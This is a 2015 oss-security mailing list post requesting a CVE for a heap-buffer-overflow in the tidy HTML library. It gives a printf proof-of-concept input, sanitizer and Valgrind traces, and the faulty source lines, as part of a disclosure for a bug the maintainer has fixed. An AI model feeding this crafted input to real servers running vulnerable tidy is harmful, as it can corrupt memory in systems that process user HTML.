Openwall GNU/*/Linux - a small security-enhanced Linux distro for servers
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Date: Thu, 4 Jun 2015 00:50:41 -0500
From: Fernando Muñoz <fernando@...l-life.com>
To: oss-security@...ts.openwall.com
Subject: CVE Request - tidy 0.99 / tidy5 heap-buffer-overflow

Hello ,

I'd like to request a CVE ID for the following issue:

tidy [1]  is affected by a write out of bounds when processing
malformed html files.
This issue could be abused on server side applications that use
php-tidy extension with user input.

The issue was confirmed, analysed and fixed by the tidy5 maintainer. [2]

POC

$ printf "\x3c\x61\x20\x62\x3d\x3c\x61\x20\x3c\x3f\x78\x6d
\x0d\x3f\x3e\x62\x3d\x22\x63\x22\x47\x20\x68\x72\x65
\x66\x3d\x22\x12\x22\xbb" > err.html

An asan-enabled build of tidy outputs:

$ tidy-asan err.html
====================================================
==2196==ERROR: AddressSanitizer: heap-buffer-overflow on address
0xb53006b1 at pc 0xb71df8fe bp 0xbfac9928 sp 0xbfac9918
WRITE of size 1 at 0xb53006b1 thread T0
    #0 0xb71df8fd in prvTidytmbstrndup (/usr/lib/libtidy-0.99.so.0+0x15c8fd)
    #1 0xb7141060 in prvTidyGetToken (/usr/lib/libtidy-0.99.so.0+0xbe060)
    #2 0xb711856e in prvTidyParseDocument (/usr/lib/libtidy-0.99.so.0+0x9556e)
    #3 0xb71f2a58 in prvTidyDocParseStream (/usr/lib/libtidy-0.99.so.0+0x16fa58)
    #4 0xb71f34a5 in tidyParseFile (/usr/lib/libtidy-0.99.so.0+0x1704a5)
    #5 0x804bfa9 (/usr/bin/tidy+0x804bfa9)
    #6 0xb6edf72d in __libc_start_main (/lib/i386-linux-gnu/libc.so.6+0x1872d)
    #7 0x804fa4e (/usr/bin/tidy+0x804fa4e)

0xb53006b1 is located 0 bytes to the right of 1-byte region
[0xb53006b0,0xb53006b1)
allocated by thread T0 here:
    #0 0xb72af18c in __interceptor_malloc
(/usr/lib/i386-linux-gnu/libasan.so.1+0x5118c)
    #1 0xb71c5963 (/usr/lib/libtidy-0.99.so.0+0x142963)
...

Valgrind with the standard build:

$ valgrind tidy err.html
...
==30499== Invalid write of size 1
==30499==    at 0x408805C: prvTidytmbstrndup (tmbstr.c:39)
==30499==    by 0x40738A8: ParseValue (lexer.c:3486)
...

==30499== Invalid write of size 1
==30499==    at 0x4088065: prvTidytmbstrndup (tmbstr.c:41)
==30499==    by 0x40738A8: ParseValue (lexer.c:3486)
==30499==    by 0x4075F39: ParseAttrs (lexer.c:3603)
==30499==    by 0x4075F39: GetTokenFromStream (lexer.c:2416)

...
file: tmbstr.c

39        while ( len-- > 0 &&  (*cp++ = *str++) )
40          /**/;
41        *cp = 0;

Credit: Fernando Muñoz

[1] tidy.sourceforge.net
[2] https://github.com/htacg/tidy-html5/issues/217

Powered by blists - more mailing lists

Your e-mail address:

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Powered by Openwall GNU/*/Linux - Powered by OpenVZ